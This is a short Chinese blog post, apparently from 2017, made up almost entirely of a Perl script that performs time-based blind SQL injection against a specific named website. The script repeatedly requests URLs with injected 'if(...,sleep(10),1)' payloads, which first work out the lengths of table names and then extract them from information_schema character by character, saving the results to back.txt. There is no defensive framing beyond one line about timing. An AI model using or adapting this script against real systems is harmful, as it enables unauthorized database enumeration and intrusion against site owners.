一个基于时间注入的perl小脚本 

 1 use strict;
 2 use warnings;
 3 use LWP::Simple;
 4 
 5 my %table_and_leng;
 6 for(my $count = 0;$count <= 49;$count++){
 7     #print "Test Table: $count\n";
 8     my $table_length=1;
 9     my $swap = $count+1;
10     while($table_length <= 30){
11         
12         print "Test Table($swap), and table_length($table_length)\n";
13         my $start_time = time;
14         get("http://www.bjmzdx.org/home/api/detail/cateId/834/id/4698) and ( if(length((select table_name from information_schema.tables where table_schema=database() limit $count,1))=$table_length,sleep(10),1) )-- -.html");
15         my $end_time = time;
16         my $fish_time = $end_time-$start_time;
17         if($fish_time >= 10){
18             print "The $swap talbe_length:$table_length\n";
19             $table_and_leng{$count} = $table_length;
20             last;
21         }
22         $table_length++;
23     }
24 
25 
26 }
27 foreach my $keys(sort keys %table_and_leng){
28         print "$keys => $table_and_leng{$keys}\n";
29 }
30 print "All table length is Done, sleep(30)";
31 sleep(30);
32 
33 my %all_tables;
34 for(my $table_count=0;$table_count <=49;$table_count++){
35     my $table_count_swap = $table_count+1;
36     my @table;
37     for(my $count=1;$count<=$table_and_leng{$table_count}; $count++){
38         foreach my $char('a'..'z','A'..'Z',0..9,'_','!','@','#','$','%','^','&','*','(',')'){
39             print "Guess $table_count_swap ->  $char\n";
40             my $start_time = time;
41             get("http://www.bjmzdx.org/home/api/detail/cateId/834/id/4698) and (   if((substr(  (select table_name from information_schema.tables where table_schema=database() limit $table_count,1),$count,1)='".$char."')  ,sleep(10),1)   )-- -.html");
42             my $end_time = time;
43             my $fish_time = $end_time-$start_time;
44             if($fish_time >= 10){
45                 print "The Char:$char\n";
46                 push @table, $char;
47                 last;
48                 
49             }
50             
51         }
52     }
53     my $table_swap = join('',@table);
54     
55     print "The $table_count_swap is:$table_swap\n";
56     $all_tables{$table_count} = $table_swap;
57 }
58 
59 open DATA, ">> back.txt" or die "Cannot write to file:$!\n";
60 print "\n\n------------------------------------------------------\n";
61 foreach my $table_keys(sort keys %all_tables){
62         print "$table_keys => $all_tables{$table_keys}\n";
63         print DATA "$table_keys\t$all_tables{$table_keys}\n";
64 }
65 print "------------------------------------------------------\n";
66 close DATA;
67 print "All Done, Please Check the file:back.txt in current dir.\n";
68 print "Done!\n";

关键是time获得时间

 

posted on 2017-02-20 15:00  Perl6  阅读(751)  评论(7编辑  收藏  举报

导航